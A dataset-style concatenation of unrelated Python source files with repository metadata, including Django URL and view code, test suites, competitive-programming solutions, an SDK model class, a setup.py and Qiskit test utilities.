def test_static_imagenet_c(self, split):
if not flags.FLAGS.fake_data:
config = image_data_utils.DataConfig(
split, corruption_static=True, corruption_level=3,
corruption_type='pixelate')
if split in ['train', 'valid']:
with self.assertRaises(ValueError):
data_lib.build_dataset(config, BATCH_SIZE)
else:
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
@parameterized.parameters(['train', 'test', 'valid'])
def test_array_imagenet_c(self, split):
if not flags.FLAGS.fake_data:
config = image_data_utils.DataConfig(
split, corruption_level=4, corruption_type='glass_blur')
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
@parameterized.parameters(['train', 'test', 'valid'])
def test_value_imagenet_c(self, split):
if not flags.FLAGS.fake_data:
config = image_data_utils.DataConfig(
split, corruption_value=.25, corruption_type='brightness')
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
def test_alt_dataset(self):
if not flags.FLAGS.fake_data:
config = image_data_utils.DataConfig('test', alt_dataset_name='celeb_a')
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
if __name__ == '__main__':
absltest.main()
|
[
"[email protected]"
] | |
0413508e37f8a9575fd78da43bf93d2e9f9765ab
|
ddab7a88b96e782430656a1292c2575c58ef3b39
|
/cfehome/cfehome/urls.py
|
12c72b540be6c60c2a23b70ae80c16f85fc6db21
|
[] |
no_license
|
HenryTruth/rapidapi
|
11d5d407f294ac0f5305c181dea7a816b8efe7b5
|
4984641e7ec284df73b8b04f74e3b9b47360c85b
|
refs/heads/master
| 2023-03-18T07:32:49.063393 | 2021-02-28T16:38:08 | 2021-02-28T16:38:08 | 343,411,202 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 840 |
py
|
"""cfehome URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('api/postings/', include('postings.api.urls', namespace='api-postings'))
]
|
[
"henrysempire111gmail.com"
] |
henrysempire111gmail.com
|
3817408a598bef35193652dc85f27df0d7823622
|
8023bdc11776a09b0fff0e9b581bbd42b8013afa
|
/h2tau/PlotEM.py
|
7e972f1232900d42d001e07c09b25d5c20d09127
|
[] |
no_license
|
uwcms/UWHiggs
|
0785d431b12df07e872a00b36279227781a6c1de
|
53c1bd2671dea2553f8bbc5dcdf56a823ccf36f6
|
refs/heads/master
| 2021-01-16T19:32:45.480056 | 2014-02-06T02:11:54 | 2014-02-06T02:11:54 | 8,310,494 | 0 | 2 | null | 2014-10-10T13:03:07 | 2013-02-20T10:02:08 |
C++
|
UTF-8
|
Python
| false | false | 1,396 |
py
|
'''
Make inclusive e-mu (Z + ttbar) control plots
'''
import os
import glob
from FinalStateAnalysis.PlotTools.Plotter import Plotter
jobid = os.environ['jobid']
output_dir = os.path.join('results', jobid, 'plots', 'em')
samples = [
'Zjets_M50',
'WZ*',
'WW*',
'ZZ*',
'TT*',
'WplusJets*',
"data_MuEG*",
]
files = []
lumifiles = []
for x in samples:
files.extend(glob.glob('results/%s/AnalyzeEM/%s.root' % (jobid, x)))
lumifiles.extend(glob.glob('inputs/%s/%s.lumicalc.sum' % (jobid, x)))
plotter = Plotter(files, lumifiles, output_dir)
# Override ordering
plotter.mc_samples = [
'TTplusJets_madgraph',
'WplusJets_madgraph',
'Zjets_M50',
'WZJetsTo3LNu*',
'WW*',
'ZZJetsTo4L*',
]
sqrts = 7 if '7TeV' in jobid else 8
plotter.plot_mc_vs_data('em', 'emMass', rebin=10, leftside=False,
xaxis='m_{e#mu} (GeV)')
plotter.add_cms_blurb(sqrts)
plotter.save('mass')
plotter.plot_mc_vs_data('em', 'mPt')
plotter.save('mPt')
plotter.plot_mc_vs_data('em', 'ePt')
plotter.save('ePt')
plotter.plot_mc_vs_data('em', 'mAbsEta')
plotter.save('mAbsEta')
plotter.plot_mc_vs_data('em', 'eAbsEta')
plotter.save('eAbsEta')
plotter.plot_mc_vs_data('em', 'nvtx')
plotter.save('nvtx')
plotter.plot_mc_vs_data('em', 'bjetCSVVeto')
plotter.save('bjetCSVVeto')
plotter.plot_mc_vs_data('em', 'bjetVeto')
plotter.save('bjetVeto')
|
[
"[email protected]"
] | |
152113e43cceee7807ab807267ca54fb2a1d1c19
|
5922398212b6e113f416a54d37c2765d7d119bb0
|
/python/Search a 2D Matrix.py
|
28456dbb8f7a1a1330809a51885131a419f64dcf
|
[] |
no_license
|
CrazyCoder4Carrot/lintcode
|
e777f73e1fdfe3b8abc9dbfc07d26602bf614151
|
33dcd7f0e2d9bee58840a3370837cb2db82de1eb
|
refs/heads/master
| 2021-01-09T20:38:59.813198 | 2017-01-16T22:34:26 | 2017-01-16T22:34:26 | 60,287,619 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 352 |
py
|
class Solution:
"""
@param matrix, a list of lists of integers
@param target, an integer
@return a boolean, indicate whether matrix contains target
"""
def searchMatrix(self, matrix, target):
# write your code here
for row in matrix:
if target in row:
return True
return False
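# Below is a sketch (not part of the original solution) of the O(log(m*n)) approach,
# assuming the classic constraints: every row is sorted and each row's first element
# is greater than the previous row's last element. The function name is made up here.
def search_matrix_binary(matrix, target):
    if not matrix or not matrix[0]:
        return False
    rows, cols = len(matrix), len(matrix[0])
    lo, hi = 0, rows * cols - 1
    while lo <= hi:
        mid = (lo + hi) // 2
        # Map the flat index back to (row, column) in the 2D matrix.
        val = matrix[mid // cols][mid % cols]
        if val == target:
            return True
        if val < target:
            lo = mid + 1
        else:
            hi = mid - 1
    return False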
|
[
"[email protected]"
] | |
2bb6b170f6c1fa3e3e754886a338b80c7b74302c
|
59a688e68421794af64bfe69a74f64b2c80cd79d
|
/math_riddles/floor_problem_challenge.py
|
ddbc10db108624c04c65eb5008db0f6129fe587a
|
[] |
no_license
|
hearues-zueke-github/python_programs
|
f23469b306e057512aadecad0ca0a02705667a15
|
d24f04ca143aa93f172210a4b9dfdd9bf1b79a15
|
refs/heads/master
| 2023-07-26T00:36:56.512635 | 2023-07-17T12:35:16 | 2023-07-17T12:35:16 | 117,093,746 | 6 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,089 |
py
|
#! /usr/bin/python3
from fractions import Fraction as frac
from math import floor as fl
if __name__=='__main__':
# solve x*floor(x*floor(x*floor(x))) = n, where n = 2020 e.g.
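    # Search strategy (as written): walk over candidate fractions numer/denom,
    # bumping the numerator until f overshoots n, then bumping the denominator until
    # it drops back below, stopping when f(a) is an integer exactly equal to n.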
def f(x):
return x*fl(x*fl(x*fl(x)))
n = 2020
numer = 1
denom = 1
# a = frac(1, 1)
is_increment_numerator = True
while True:
a = frac(numer, denom)
y = f(a)
fl_y = fl(y)
print("numer: {}, denom: {}, float(y): {}".format(numer, denom, float(y)))
if (y.numerator % y.denominator == 0) and (fl_y == n):
break
if is_increment_numerator:
numer += 1
a_new = frac(numer, denom)
# fl_a_new = fl(f(a_new))
if f(a_new)>n:
# if fl_a_new>n:
is_increment_numerator = False
a = a_new
else:
denom += 1
a_new = frac(numer, denom+1)
# fl_a_new = fl(f(a_new))
if f(a_new)<n:
# if fl_a_new<n:
is_increment_numerator = True
a = a_new
|
[
"[email protected]"
] | |
5cd36692ca51be88c22fee7de2ef5d3cd9b98621
|
551b75f52d28c0b5c8944d808a361470e2602654
|
/huaweicloud-sdk-cce/huaweicloudsdkcce/v3/model/node_nic_spec.py
|
964ad72f81427f81c112f83c177d65a55488e0f1
|
[
"Apache-2.0"
] |
permissive
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
9d6597ce8ab666a9a297b3d936aeb85c55cf5877
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
refs/heads/master
| 2023-05-08T21:32:31.920300 | 2021-05-26T08:54:18 | 2021-05-26T08:54:18 | 370,898,764 | 0 | 0 |
NOASSERTION
| 2021-05-26T03:50:07 | 2021-05-26T03:50:07 | null |
UTF-8
|
Python
| false | false | 3,422 |
py
|
# coding: utf-8
import pprint
import re
import six
class NodeNicSpec:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'primary_nic': 'NicSpec',
'ext_nics': 'list[NicSpec]'
}
attribute_map = {
'primary_nic': 'primaryNic',
'ext_nics': 'extNics'
}
def __init__(self, primary_nic=None, ext_nics=None):
"""NodeNicSpec - a model defined in huaweicloud sdk"""
self._primary_nic = None
self._ext_nics = None
self.discriminator = None
if primary_nic is not None:
self.primary_nic = primary_nic
if ext_nics is not None:
self.ext_nics = ext_nics
@property
def primary_nic(self):
"""Gets the primary_nic of this NodeNicSpec.
:return: The primary_nic of this NodeNicSpec.
:rtype: NicSpec
"""
return self._primary_nic
@primary_nic.setter
def primary_nic(self, primary_nic):
"""Sets the primary_nic of this NodeNicSpec.
:param primary_nic: The primary_nic of this NodeNicSpec.
:type: NicSpec
"""
self._primary_nic = primary_nic
@property
def ext_nics(self):
"""Gets the ext_nics of this NodeNicSpec.
扩展网卡
:return: The ext_nics of this NodeNicSpec.
:rtype: list[NicSpec]
"""
return self._ext_nics
@ext_nics.setter
def ext_nics(self, ext_nics):
"""Sets the ext_nics of this NodeNicSpec.
扩展网卡
:param ext_nics: The ext_nics of this NodeNicSpec.
:type: list[NicSpec]
"""
self._ext_nics = ext_nics
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NodeNicSpec):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"[email protected]"
] | |
be980be27bb8f62cb951489a5a2b039bb1c37cb9
|
c8cee25ecb60ca3e6ce5e24c37db57f82f9858f6
|
/ConversionPDFaExcelconPythonPandas/pdfaexcelconpandas.py
|
f2ae448d09dcaa10e19f8e115b76df442765633a
|
[] |
no_license
|
mecomontes/Python
|
a0b4a0b69ae33ad3623e908731710563392d1615
|
daba4247cca90c43a979e3e3f292cd7b8951b3d0
|
refs/heads/master
| 2023-05-30T05:24:41.999196 | 2020-03-23T02:30:09 | 2020-03-23T02:30:09 | 249,317,310 | 1 | 0 | null | 2023-05-22T22:42:36 | 2020-03-23T02:29:38 |
Python
|
UTF-8
|
Python
| false | false | 339 |
py
|
from tabula import read_pdf
df = read_pdf('../Pdfs/Libro1.pdf',
guess=False,
pandas_options={'skiprows':[0,1],'header':None}
)
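# Note: recent tabula-py releases return a list of DataFrames, so you may need
# read_pdf(...)[0] before calling .head() and the column assignment below.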
df.head()
headers = ['Mes','Dia','Año','PptSalpo','TempMax','TempMin','Ppt','Wind','Hum','Solar']
df.columns = headers
df.head()
df.to_excel('../Xls/Libro1.xlsx')
|
[
"[email protected]"
] | |
155ca9d2c3c3e780023de74a3f730658e9eb5a3e
|
eb36f5ee5b97aae79e7da87602fd4da293a52892
|
/tests/op/test_op_setitem.py
|
af18cd175b6825ed13b183153485f125ea4ab78b
|
[
"MIT"
] |
permissive
|
turiya/toy-auto-diff
|
e3f3adc803d0f2c34d9211a62bc646fa491372e2
|
bd54cd4d34b482498927449608d47039368dcd8a
|
refs/heads/master
| 2020-06-20T03:25:14.975249 | 2019-03-02T04:58:30 | 2019-03-02T04:58:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 704 |
py
|
import numpy as np
import auto_diff as ad
from .util import NumGradCheck
class TestOpSetItem(NumGradCheck):
def test_forward(self):
x_val = np.random.random((3, 4))
x = ad.variable(x_val)
y = ad.setitem(x, (1, 2), ad.constant(5.0))
actual = y.forward()[1, 2]
expect = 5.0
self.assertEqual(x.shape, y.shape)
self.assertTrue(np.allclose(expect, actual), (expect, actual))
def test_backward(self):
with self.assertRaises(NotImplementedError):
x_val = np.random.random((3, 4))
x = ad.variable(x_val)
y = ad.setitem(x, (1, 2), ad.constant(5.0))
self.numeric_gradient_check(y, {}, [x])
|
[
"[email protected]"
] | |
fd521e1e8e0199069605ae7e221b0c9872a0793f
|
de56ee2369d36c93ad802f0359f3274b9a3f0a25
|
/photos/views.py
|
24f001752b2e3f0c656bd3f2ee705b695289f932
|
[] |
no_license
|
Anubhav722/asynchronous-celery-tasks
|
bdfd485b6c6b2777a4712ad64ebabf347e717654
|
a21f055e8e524db662d21f60dac2f8daab075f63
|
refs/heads/master
| 2021-01-23T00:45:41.631402 | 2017-05-31T10:47:44 | 2017-05-31T10:47:44 | 92,840,568 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 438 |
py
|
from django.shortcuts import render
from django.views.generic.list import ListView
from photos.models import Photo
from feedback.forms import FeedbackForm
# Create your views here.
class PhotoView(ListView):
model = Photo
template_name = 'photos/photo_list.html'
paginate_by = 24
def get_context_data(self, **kwargs):
context = super(PhotoView, self).get_context_data(**kwargs)
context['form'] = FeedbackForm()
return context
|
[
"[email protected]"
] | |
5864bdacd428ec82508f2d42b00accffcb92af2e
|
8410bb5a2e8849bb3a554b95ddc713d88f3440c4
|
/aws-dev/awsdev9/venv/Lib/site-packages/dns/rdtypes/ANY/DS(1).py
|
7d457b2281e3fa4a816885299c994457c23f6ba4
|
[
"MIT"
] |
permissive
|
PacktPublishing/-AWS-Certified-Developer---Associate-Certification
|
ae99b6c1efb30e8fab5b76e3d8c821823a4cd852
|
b9838b4e038b42ad1813a296379cbbc40cab6286
|
refs/heads/master
| 2022-11-03T04:37:49.014335 | 2022-10-31T05:42:19 | 2022-10-31T05:42:19 | 219,964,717 | 13 | 11 |
MIT
| 2021-06-02T00:57:45 | 2019-11-06T09:54:09 |
Python
|
UTF-8
|
Python
| false | false | 950 |
py
|
# Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
# Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import dns.rdtypes.dsbase
class DS(dns.rdtypes.dsbase.DSBase):
"""DS record"""
|
[
"[email protected]"
] | |
beb326dc1932346c4a7e3a63941053a44da0e48a
|
d2eb7bd335175edd844a3e6c1c633ee0dc2dbb25
|
/contests_atcoder/arc110/arc110_a.py
|
72fdc5c78f226f000d840020f629b98b4bbf4129
|
[
"BSD-2-Clause"
] |
permissive
|
stdiorion/competitive-programming
|
5020a12b85f1e691ceb0cacd021606a9dc58b72c
|
e7cf8ef923ccefad39a1727ca94c610d650fcb76
|
refs/heads/main
| 2023-03-27T01:13:42.691586 | 2021-03-08T08:05:53 | 2021-03-08T08:05:53 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 641 |
py
|
from itertools import accumulate,chain,combinations,groupby,permutations,product
from collections import deque,Counter
from bisect import bisect_left,bisect_right
from math import gcd,sqrt,sin,cos,tan,degrees,radians
from fractions import Fraction
from decimal import Decimal
from functools import reduce
import sys
input = lambda: sys.stdin.readline().rstrip()
#from sys import setrecursionlimit
#setrecursionlimit(10**7)
MOD=10**9+7
INF=float('inf')
def lcm_base(x, y):
return (x * y) // gcd(x, y)
def lcm(*numbers):
return reduce(lcm_base, numbers, 1)
n = int(input())
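# The unary-sign chain below contains an even number of minus signs, so it evaluates to +1;
# i.e. the printed answer is lcm(2, ..., n) + 1 (remainder 1 when divided by each of 2..n).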
print(---+-+--+---+----+-1 + lcm(*list(range(2, n + 1))))
|
[
"[email protected]"
] | |
b03d70f00d9f929eb2e0d6a9404207541522dfe7
|
52cb25dca22292fce4d3907cc370098d7a57fcc2
|
/BAEKJOON/수학1/1748_수 이어 쓰기1.py
|
167d4e44ab35c67945bc83a25c6beb23aeb37edd
|
[] |
no_license
|
shjang1013/Algorithm
|
c4fc4c52cbbd3b7ecf063c716f600d1dbfc40d1a
|
33f2caa6339afc6fc53ea872691145effbce0309
|
refs/heads/master
| 2022-09-16T12:02:53.146884 | 2022-08-31T16:29:04 | 2022-08-31T16:29:04 | 227,843,135 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 178 |
py
|
# Print the number of digits of the new (concatenated) number 1 2 3 ... N
N = input()
n = len(N)
count = 0
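# Numbers with i+1 digits contribute 9 * 10**i values of i+1 digits each;
# the final (partial) block runs from 10**(n-1) up to N itself, n digits apiece.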
for i in range(n-1):
count += 9*(10**i)*(i+1)
count += (int(N)-10**(n-1)+1)*n
print(count)
|
[
"[email protected]"
] | |
c73ec9c62a678fa9a4f062d57defffbd993e56da
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/21/usersdata/75/8322/submittedfiles/exercicio24.py
|
ff41fdd82bbba07417472c07bcf3f1e9ba01e933
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 206 |
py
|
# -*- coding: utf-8 -*-
from __future__ import division
import math
i=1
a= int(input('Enter the value of the first number:'))
b= int(input('Enter the value of the second number:'))
while i<=(a and b):
|
[
"[email protected]"
] | |
e2a45d6a3e24edb3074e7e521b9f78b91a415f56
|
6e6f97f416c06aada38c3a9db23eed7517bfaa6d
|
/comment/tests/test_models/test_followers.py
|
0a11fadb19eb1f3dec4e17ab1490bebd3bb2f26c
|
[
"MIT"
] |
permissive
|
ZendaInnocent/sogea
|
1735ad047539c09a5c81e196a7a1963022452098
|
54cf257856cae451ad87e2396b8e44a34c0c6daf
|
refs/heads/main
| 2023-08-23T07:18:45.741826 | 2021-10-28T13:19:06 | 2021-10-28T13:19:06 | 365,683,816 | 0 | 0 |
MIT
| 2021-05-09T06:29:57 | 2021-05-09T06:29:57 | null |
UTF-8
|
Python
| false | false | 7,294 |
py
|
from unittest.mock import patch
from django.contrib.contenttypes.models import ContentType
from comment.conf import settings
from comment.models import Follower
from comment.tests.base import BaseCommentTest
class FollowerModelTest(BaseCommentTest):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.comment_test_follow = cls.create_comment(cls.content_object_1)
cls.email = '[email protected]'
cls.follower = Follower.objects.create(
email=cls.email,
username='test',
content_object=cls.comment_test_follow
)
def test_can_create_entry(self):
self.assertIsNotNone(self.follower)
def test_string_value(self):
self.assertEqual(str(self.follower), f'{str(self.comment_test_follow)} followed by {self.email}')
self.assertEqual(repr(self.follower), f'{str(self.comment_test_follow)} followed by {self.email}')
class FollowerManagerTest(BaseCommentTest):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.manager = Follower.objects
cls.follower_email = '[email protected]'
cls.unfollower_email = '[email protected]'
cls.comment_test_follow = cls.create_comment(cls.content_object_1)
cls.comment_without_email = cls.create_comment(cls.content_object_1, user=cls.user_without_email)
cls.follower = cls.manager.create(
email=cls.follower_email,
username='test',
content_object=cls.comment_test_follow
)
def test_is_following(self):
self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
self.assertFalse(self.manager.is_following(self.unfollower_email, self.comment_test_follow))
def test_follow_return_none_on_missing_email(self):
self.assertIsNone(self.manager.follow('', 'username', self.comment_test_follow))
def test_follow_return_none_if_email_is_already_follow(self):
self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
self.assertIsNone(self.manager.follow(self.follower_email, 'username', self.comment_test_follow))
def test_follow_create_follower_instance(self):
initial_count = self.manager.count()
follower = self.manager.follow(self.unfollower_email, 'username', self.comment_test_follow)
self.assertIsInstance(follower, self.manager.model)
self.assertEqual(self.manager.count(), initial_count + 1)
def test_unfollow_delete_follower_instance(self):
initial_count = self.manager.count()
self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
self.manager.unfollow(self.follower_email, self.comment_test_follow)
self.assertEqual(self.manager.count(), initial_count - 1)
def test_toggle_follow_return_false_on_missing_email(self):
email = None
result = self.manager.toggle_follow(email=email, username='test', model_object=self.comment_test_follow)
self.assertFalse(result)
def test_toggle_follow_for_follower(self):
"""set the follower to unfollower and return false"""
self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
result = self.manager.toggle_follow(
email=self.follower_email,
username='test_user',
model_object=self.comment_test_follow
)
self.assertFalse(result)
self.assertFalse(self.manager.is_following(self.follower_email, self.comment_test_follow))
def test_toggle_follow_for_unfollower(self):
"""set the unfollower to follower and return true"""
self.assertFalse(self.manager.is_following(self.unfollower_email, self.comment_test_follow))
result = self.manager.toggle_follow(
email=self.unfollower_email,
username='test_user',
model_object=self.comment_test_follow
)
self.assertTrue(result)
self.assertTrue(self.manager.is_following(self.unfollower_email, self.comment_test_follow))
def test_follow_parent_thread_for_comment_no_email(self):
self.assertFalse(self.comment_without_email.email)
self.assertFalse(self.manager.is_following(self.comment_without_email.email, self.comment_without_email))
self.manager.follow_parent_thread_for_comment(self.comment_without_email)
self.assertFalse(self.manager.is_following(self.comment_without_email.email, self.comment_without_email))
@patch.object(settings, 'COMMENT_ALLOW_SUBSCRIPTION', False)
def test_follow_parent_thread_for_comment_child_comment(self):
child_comment = self.create_comment(self.content_object_1, user=self.user_2, parent=self.comment_without_email)
# the parent (thread) will not be followed on creating child comment
self.assertFalse(self.manager.is_following(child_comment.email, child_comment.content_object))
# the parent comment (thread) is not followed yet
self.assertFalse(self.manager.is_following(child_comment.email, self.comment_without_email))
# child comment cannot be followed
self.assertFalse(self.manager.is_following(child_comment.email, child_comment))
self.manager.follow_parent_thread_for_comment(child_comment)
# the parent (thread) will not be followed on creating child comment
self.assertFalse(self.manager.is_following(child_comment.email, child_comment.content_object))
# the parent is now followed
self.assertTrue(self.manager.is_following(child_comment.email, self.comment_without_email))
# child comment cannot be followed
self.assertFalse(self.manager.is_following(child_comment.email, child_comment))
@patch.object(settings, 'COMMENT_ALLOW_SUBSCRIPTION', False)
def test_follow_parent_thread_for_comment_parent_comment(self):
parent_comment = self.create_comment(self.content_object_1, user=self.user_2)
# the parent (thread) is not followed yet
self.assertFalse(self.manager.is_following(parent_comment.email, parent_comment.content_object))
# parent comment is not followed yet
self.assertFalse(self.manager.is_following(parent_comment.email, parent_comment))
self.manager.follow_parent_thread_for_comment(parent_comment)
# the parent (thread) is now followed
self.assertTrue(self.manager.is_following(parent_comment.email, parent_comment.content_object))
# parent comment is now followed
self.assertTrue(self.manager.is_following(parent_comment.email, parent_comment))
def test_get_all_followers_for_model_object(self):
followers = self.manager.filter_for_model_object(self.comment_test_follow)
content_type = ContentType.objects.get_for_model(self.comment_test_follow)
self.assertNotEqual(followers.count(), 0)
self.assertEqual(
list(followers),
list(self.manager.filter(content_type=content_type, object_id=self.comment_test_follow.id))
)
def test_get_get_emails_for_model_object(self):
emails = self.manager.get_emails_for_model_object(self.comment_test_follow)
self.assertIn(self.comment_test_follow.email, emails)
|
[
"[email protected]"
] | |
0914435a0dd3e06ec45e07ea57a79f9c4688419e
|
471a036309c05b59243033f2480e27e19268ec55
|
/src/london/setup.py
|
574ffec30ba669a92a1fc8544c5c6533d47e5545
|
[
"BSD-2-Clause"
] |
permissive
|
avelino/votacao_paredao_bbb
|
1bbf33b9ec00f033db5b1d558190135315d50b03
|
875ac157b207fee80be6841f9b17c41b7069e15d
|
refs/heads/master
| 2021-01-20T12:17:48.362512 | 2012-07-13T05:41:44 | 2012-07-13T05:41:44 | 4,928,781 | 0 | 0 | null | 2020-07-27T11:05:32 | 2012-07-06T17:51:03 |
Python
|
UTF-8
|
Python
| false | false | 1,682 |
py
|
import london
import os
import sys
# Download setuptools if it is not found before attempting to import it
try:
import ez_setup
ez_setup.use_setuptools()
except ImportError:
pass
from setuptools import setup
def fullsplit(path, result=None):
"""
Split a pathname into components (the opposite of os.path.join) in a
platform-neutral way. Copied from Django.
"""
if result is None:
result = []
head, tail = os.path.split(path)
if head == '':
return [tail] + result
if head == path:
return result
return fullsplit(head, [tail] + result)
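# Illustrative note (added): on a POSIX system, fullsplit('london/core/handlers')
# returns ['london', 'core', 'handlers'], which the loop below joins with '.'
# to build dotted package names for setuptools.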
packages = []
data_files = []
london_dir = 'london'
for dirpath, dirnames, filenames in os.walk(london_dir):
for i, dirname in enumerate(dirnames):
if dirname.startswith('.'): del dirnames[i]
if '__init__.py' in filenames:
packages.append('.'.join(fullsplit(dirpath)))
elif filenames:
data_files.append([dirpath, [os.path.join(dirpath, f) for f in filenames]])
if sys.version_info[0] >= 3:
install_requires = ['distribute', 'Jinja2', 'nose', 'PyDispatcher', 'BeautifulSoup4','python-money',
'tornado','pymongo==2.1.1']
else:
install_requires = ['distribute', 'Jinja2', 'nose', 'simplejson', 'PyDispatcher',
'BeautifulSoup==3.2.0','python-money','tornado','pymongo==2.1.1']
setup(
name='London',
version=london.__version__,
#url='',
author=london.__author__,
license=london.__license__,
packages=packages,
data_files=data_files,
scripts=['london/bin/london-admin.py','london/bin/london-create-project.py'],
install_requires=install_requires,
#setup_requires=[],
)
|
[
"[email protected]"
] | |
4c9cbf1a4a291e0732c209b2377e48be7480b156
|
ec1059f4ccea10deb2cb8fd7f9458700a5e6ca4c
|
/venv/Lib/site-packages/qiskit/test/utils.py
|
05433cc98a74738a7ca38e52e181892c3a231072
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
shivam675/Quantum-CERN
|
b60c697a3a7ad836b3653ee9ce3875a6eafae3ba
|
ce02d9198d9f5a1aa828482fea9b213a725b56bb
|
refs/heads/main
| 2023-01-06T20:07:15.994294 | 2020-11-13T10:01:38 | 2020-11-13T10:01:38 | 330,435,191 | 1 | 0 |
MIT
| 2021-01-17T16:29:26 | 2021-01-17T16:29:25 | null |
UTF-8
|
Python
| false | false | 3,962 |
py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Utils for using with Qiskit unit tests."""
import logging
import os
import unittest
from enum import Enum
from itertools import product
from qiskit import __path__ as qiskit_path
class Path(Enum):
"""Helper with paths commonly used during the tests."""
# Main SDK path: qiskit/
SDK = qiskit_path[0]
# test.python path: qiskit/test/python/
TEST = os.path.normpath(os.path.join(SDK, '..', 'test', 'python'))
# Examples path: examples/
EXAMPLES = os.path.normpath(os.path.join(SDK, '..', 'examples'))
# Schemas path: qiskit/schemas
SCHEMAS = os.path.normpath(os.path.join(SDK, 'schemas'))
# Sample QASMs path: qiskit/test/python/qasm
QASMS = os.path.normpath(os.path.join(TEST, 'qasm'))
def setup_test_logging(logger, log_level, filename):
"""Set logging to file and stdout for a logger.
Args:
logger (Logger): logger object to be updated.
log_level (str): logging level.
filename (str): name of the output file.
"""
# Set up formatter.
log_fmt = ('{}.%(funcName)s:%(levelname)s:%(asctime)s:'
' %(message)s'.format(logger.name))
formatter = logging.Formatter(log_fmt)
# Set up the file handler.
file_handler = logging.FileHandler(filename)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
if os.getenv('STREAM_LOG'):
# Set up the stream handler.
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
# Set the logging level from the environment variable, defaulting
# to INFO if it is not a valid level.
level = logging._nameToLevel.get(log_level, logging.INFO)
logger.setLevel(level)
